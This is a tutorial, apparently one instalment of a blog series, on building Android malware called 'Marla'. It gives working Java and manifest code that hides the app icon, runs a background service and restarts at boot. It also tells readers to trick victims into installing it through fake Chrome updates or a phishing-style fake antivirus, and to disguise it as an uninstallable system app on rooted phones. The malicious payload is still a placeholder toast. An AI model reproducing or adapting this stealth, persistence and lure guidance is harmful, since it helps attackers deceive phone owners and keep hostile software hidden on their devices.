A Tumor Called Marla
Hi everyone, today we will cover how to hide our malware from the user and run our malware as a service.
When the Malware run for the first time it will hide the app icon from the user laucher, and run a service.
The service only query the OS version for the moment, we will be much more malicious in the next tutorial.
How to infect user ?
When the user will install the malware, we want it to be persistent.
We need to force the user to install our malware and run it but how ?
Social Engineering
Here is one of the way to force the user to download Marla
Fake Chrome update ( Everyone use chrome on android, most of the user ) or a fake antivirus ( Phishing page telling the user get 10 virus. Trick him to download your “Antivirus” )
If you choose the Antivirus way, make an app that look like a legit antivirus.
When the user will download, install the app and run it. We are good
Why should we use these techniques ?
New version of android need to be run once to be able to be started at boot time and use permission ( see Android Malware for more information about permission).
Hiding app icon
Let’s start to code and hide our app icon
Today our task is to disable the app component of our application here the icon. (You can start from scratch or use the old code of the previous tutorial ).
n.b : The app won’t be persistent If the user haven’t his phone rooted. The user will be able to uninstall the malware however If the android phone is rooted we can hide the app as a system app and give a name like : com.android.update, he won’t be able to uninstall system app
Main Activity
package com.android.marla;
import android.content.pm.PackageManager;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.widget.Toast;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
PackageManager pm = this.getPackageManager();
//The line below will hide your app icon
pm.setComponentEnabledSetting(
getComponentName(),
PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
PackageManager.DONT_KILL_APP);
//Just show a Toast
Toast.makeText(this, "Updating your system please wait ...", Toast.LENGTH_LONG);
}
}
Here is what you should see
Now if you kill the app after a moment.
No Marla app
Run a service
We want a running service that can gather information. Let’s make a new class
package com.android.marla;
import android.app.Service;
import android.content.Intent;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.support.annotation.Nullable;
import android.widget.Toast;
public class MainService extends Service{
@Nullable
@Override
public IBinder onBind(Intent intent) {
return null;
}
public void onCreate()
{
Handler handler = new Handler(Looper.getMainLooper());
handler.post(new Runnable(){
@Override
public void run() {
Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
}
});
}
}
Here I just create a Toast for PoC , here is the function
public void onCreate()
{
Handler handler = new Handler(Looper.getMainLooper());
handler.post(new Runnable(){
@Override
public void run() {
Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
}
});
}
In your android Manifest add the service
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.marla">
<!--PERMISSION-->
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<!--PERMISSION-->
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:supportsRtl="true"
android:theme="@style/AppTheme">
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<!-- THE SERVICE IS BELOW-->
<service android:name=".MainService"/>
</application>
</manifest>
Well done You’ve created a service now let’s run it at boot time. ( I hope you remember the previous tutorial for this part)
Receiver :
package com.android.marla;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
public class BootReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
/** if the boot is completed **/
if(Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())){
/** Start the MainActivity.class everytime the phone boot**/
Intent i = new Intent(context, MainActivity.class);
context.startActivity(i);
}
}
}
Well done, your application is not malicious for the moment. Your app look like an adware for the moment.